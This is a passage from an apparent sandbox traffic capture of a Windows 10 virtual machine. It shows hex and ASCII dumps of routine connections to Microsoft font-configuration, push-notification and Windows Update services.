                                                                            2024-07-29 22:56:53 UTC852INData Raw: 90 5d 1f 02 9e ab 1e 78 26 03 f6 21 b6 dd 16 97 63 62 84 62 26 f1 1e 70 16 92 d9 6d 45 3b eb 7e e0 4b c0 b7 8b 99 c4 64 b2 a0 bb 80 67 99 bd 4d cf 83 e4 fc ff 0a dc 9e 2c e8 2e a3 1f d2 48 0a 6c 93 c9 1c 1d c5 6c e5 f1 15 88 97 e4 36 de 9f 00 ce 2e 45 83 bb 7a 07 46 3d 80 2f 1b ee 9c 00 30 85 d2 9b 90 82 ab 6d b9 fd 00 f0 43 e0 a1 62 26 71 04 20 59 d0 3d 88 b2 76 eb f2 1e 44 aa d4 a9 fe c0 ec 4d d6 b5 1a 24 6e c6 5d 6f 90 d3 df f3 70 e8 e3 8b 41 3a 36 6e 40 52 da bb b2 e1 4e a7 41 22 80 14 25 23 88 e5 58 86 ec 96 a7 6a 9c 29 c4 b1 1a 44 76 78 67 95 99 23 59 d0 01 20 4b 73 3d 8a 83 c0 19 fd 81 0f b7 c9 d4 ca 06 6d 47 ec 6a a3 2a ef 76 e0 e1 52 34 08 03 a3 5f 40 76 6c 11 92 d4 dc d1 3b 30 ba 0d d8 9b 0d 77 16 10 65 f9 a8 3f 12 f7 21 a7 61 99 b9 3a 2d 32 87
                                                                            Data Ascii: ]x&!cbb&pmE;~KdgM,.Hll6.EzF=/0mCb&q Y=vDM$n]opA:6n@RNA"%#Xj)Dvxg#Y Ks=mGj*vR4_@vl;0we?!a:-2


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.64974823.32.185.164443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:54 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Encoding: identity
                                                                            User-Agent: Microsoft BITS/7.8
                                                                            Host: fs.microsoft.com
                                                                            2024-07-29 22:56:54 UTC467INHTTP/1.1 200 OK
                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                            Content-Type: application/octet-stream
                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                            Server: ECAcc (chd/0759)
                                                                            X-CID: 11
                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                            X-Ms-Region: prod-eus-z1
                                                                            Cache-Control: public, max-age=202064
                                                                            Date: Mon, 29 Jul 2024 22:56:54 GMT
                                                                            Connection: close
                                                                            X-CID: 2


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.64974923.32.185.164443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:55 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Encoding: identity
                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                            Range: bytes=0-2147483646
                                                                            User-Agent: Microsoft BITS/7.8
                                                                            Host: fs.microsoft.com
                                                                            2024-07-29 22:56:55 UTC535INHTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                            ApiVersion: Distribute 1.1
                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                            X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                            Cache-Control: public, max-age=202041
                                                                            Date: Mon, 29 Jul 2024 22:56:55 GMT
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            X-CID: 2
                                                                            2024-07-29 22:56:55 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            15192.168.2.64975040.113.110.67443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:56:57 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 45 52 75 6e 59 56 5a 4e 55 47 4c 37 46 2b 6e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 31 30 66 35 65 34 30 36 61 34 37 65 63 63 35 0d 0a 0d 0a
                                                                            Data Ascii: CNT 1 CON 305MS-CV: bERunYVZNUGL7F+n.1Context: 310f5e406a47ecc5
                                                                            2024-07-29 22:56:57 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                            2024-07-29 22:56:57 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 62 45 52 75 6e 59 56 5a 4e 55 47 4c 37 46 2b 6e 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 31 30 66 35 65 34 30 36 61 34 37 65 63 63 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 35 75 5a 4e 4a 74 6c 43 73 72 49 77 57 53 46 6b 70 75 74 30 66 36 70 74 70 6a 63 47 58 31 31 61 76 4e 53 64 52 58 53 56 6c 67 7a 68 5a 44 79 4d 50 6c 37 56 70 6b 44 41 45 71 64 45 44 71 38 5a 50 42 73 30 57 79 6d 68 50 73 74 70 39 35 55 48 73 77 31 46 78 49 52 75 79 33 58 30 54 38 4f 66 34 73 64 59 45 70 63 70 72 64 6f 75
                                                                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: bERunYVZNUGL7F+n.2Context: 310f5e406a47ecc5<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
                                                                            2024-07-29 22:56:57 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 45 52 75 6e 59 56 5a 4e 55 47 4c 37 46 2b 6e 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 31 30 66 35 65 34 30 36 61 34 37 65 63 63 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: bERunYVZNUGL7F+n.3Context: 310f5e406a47ecc5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                            2024-07-29 22:56:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                            Data Ascii: 202 1 CON 58
                                                                            2024-07-29 22:56:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 44 63 38 4f 41 4b 64 70 6f 30 4b 70 37 6a 73 66 58 74 5a 56 34 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                            Data Ascii: MS-CV: Dc8OAKdpo0Kp7jsfXtZV4g.0Payload parsing failed.


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            16192.168.2.64975140.113.110.67443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:57:17 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 61 6c 52 4e 67 79 65 48 71 45 36 4d 58 61 41 70 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 63 35 36 32 30 39 30 31 61 35 63 62 33 65 0d 0a 0d 0a
                                                                            Data Ascii: CNT 1 CON 305MS-CV: alRNgyeHqE6MXaAp.1Context: 98c5620901a5cb3e
                                                                            2024-07-29 22:57:17 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                            2024-07-29 22:57:17 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 61 6c 52 4e 67 79 65 48 71 45 36 4d 58 61 41 70 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 63 35 36 32 30 39 30 31 61 35 63 62 33 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 35 75 5a 4e 4a 74 6c 43 73 72 49 77 57 53 46 6b 70 75 74 30 66 36 70 74 70 6a 63 47 58 31 31 61 76 4e 53 64 52 58 53 56 6c 67 7a 68 5a 44 79 4d 50 6c 37 56 70 6b 44 41 45 71 64 45 44 71 38 5a 50 42 73 30 57 79 6d 68 50 73 74 70 39 35 55 48 73 77 31 46 78 49 52 75 79 33 58 30 54 38 4f 66 34 73 64 59 45 70 63 70 72 64 6f 75
                                                                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: alRNgyeHqE6MXaAp.2Context: 98c5620901a5cb3e<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
                                                                            2024-07-29 22:57:17 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 61 6c 52 4e 67 79 65 48 71 45 36 4d 58 61 41 70 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 38 63 35 36 32 30 39 30 31 61 35 63 62 33 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: alRNgyeHqE6MXaAp.3Context: 98c5620901a5cb3e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                            2024-07-29 22:57:17 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                            Data Ascii: 202 1 CON 58
                                                                            2024-07-29 22:57:17 UTC58INData Raw: 4d 53 2d 43 56 3a 20 79 55 6f 55 52 65 2b 31 7a 6b 71 6d 62 2b 56 78 2f 76 44 41 75 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                            Data Ascii: MS-CV: yUoURe+1zkqmb+Vx/vDAuw.0Payload parsing failed.


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.64975320.12.23.50443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:57:27 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                            Host: slscr.update.microsoft.com
                                                                            2024-07-29 22:57:27 UTC560INHTTP/1.1 200 OK
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Content-Type: application/octet-stream
                                                                            Expires: -1
                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                            MS-CorrelationId: 77ebd27e-4a02-4048-9433-0282ed370fa0
                                                                            MS-RequestId: 9ffc8e85-130a-4f78-9e94-2a0fd1df1691
                                                                            MS-CV: lJ9uZRtXoUuzYn4l.0
                                                                            X-Microsoft-SLSClientCache: 1440
                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                            X-Content-Type-Options: nosniff
                                                                            Date: Mon, 29 Jul 2024 22:57:27 GMT
                                                                            Connection: close
                                                                            Content-Length: 30005
                                                                            2024-07-29 22:57:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                            2024-07-29 22:57:27 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18192.168.2.64975440.113.110.67443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:57:45 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2f 78 4e 51 68 74 38 77 48 30 75 4f 44 67 4f 59 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 33 35 34 35 39 31 37 31 61 32 61 38 61 31 65 0d 0a 0d 0a
                                                                            Data Ascii: CNT 1 CON 305MS-CV: /xNQht8wH0uODgOY.1Context: 735459171a2a8a1e
                                                                            2024-07-29 22:57:45 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                            2024-07-29 22:57:45 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 2f 78 4e 51 68 74 38 77 48 30 75 4f 44 67 4f 59 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 33 35 34 35 39 31 37 31 61 32 61 38 61 31 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 35 75 5a 4e 4a 74 6c 43 73 72 49 77 57 53 46 6b 70 75 74 30 66 36 70 74 70 6a 63 47 58 31 31 61 76 4e 53 64 52 58 53 56 6c 67 7a 68 5a 44 79 4d 50 6c 37 56 70 6b 44 41 45 71 64 45 44 71 38 5a 50 42 73 30 57 79 6d 68 50 73 74 70 39 35 55 48 73 77 31 46 78 49 52 75 79 33 58 30 54 38 4f 66 34 73 64 59 45 70 63 70 72 64 6f 75
                                                                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: /xNQht8wH0uODgOY.2Context: 735459171a2a8a1e<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
                                                                            2024-07-29 22:57:45 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2f 78 4e 51 68 74 38 77 48 30 75 4f 44 67 4f 59 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 33 35 34 35 39 31 37 31 61 32 61 38 61 31 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: /xNQht8wH0uODgOY.3Context: 735459171a2a8a1e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                            2024-07-29 22:57:45 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                            Data Ascii: 202 1 CON 58
                                                                            2024-07-29 22:57:45 UTC58INData Raw: 4d 53 2d 43 56 3a 20 68 6d 45 73 6c 69 68 66 33 45 75 51 6e 37 34 74 55 35 78 7a 4b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                            Data Ascii: MS-CV: hmEslihf3EuQn74tU5xzKg.0Payload parsing failed.


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            19192.168.2.65879540.113.110.67443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:58:18 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 34 6b 70 4f 65 4e 6f 68 75 30 75 6b 57 5a 76 49 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 34 66 62 38 38 30 65 30 32 65 39 35 37 66 66 0d 0a 0d 0a
                                                                            Data Ascii: CNT 1 CON 305MS-CV: 4kpOeNohu0ukWZvI.1Context: 24fb880e02e957ff
                                                                            2024-07-29 22:58:18 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                            2024-07-29 22:58:18 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 34 6b 70 4f 65 4e 6f 68 75 30 75 6b 57 5a 76 49 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 34 66 62 38 38 30 65 30 32 65 39 35 37 66 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 58 35 75 5a 4e 4a 74 6c 43 73 72 49 77 57 53 46 6b 70 75 74 30 66 36 70 74 70 6a 63 47 58 31 31 61 76 4e 53 64 52 58 53 56 6c 67 7a 68 5a 44 79 4d 50 6c 37 56 70 6b 44 41 45 71 64 45 44 71 38 5a 50 42 73 30 57 79 6d 68 50 73 74 70 39 35 55 48 73 77 31 46 78 49 52 75 79 33 58 30 54 38 4f 66 34 73 64 59 45 70 63 70 72 64 6f 75
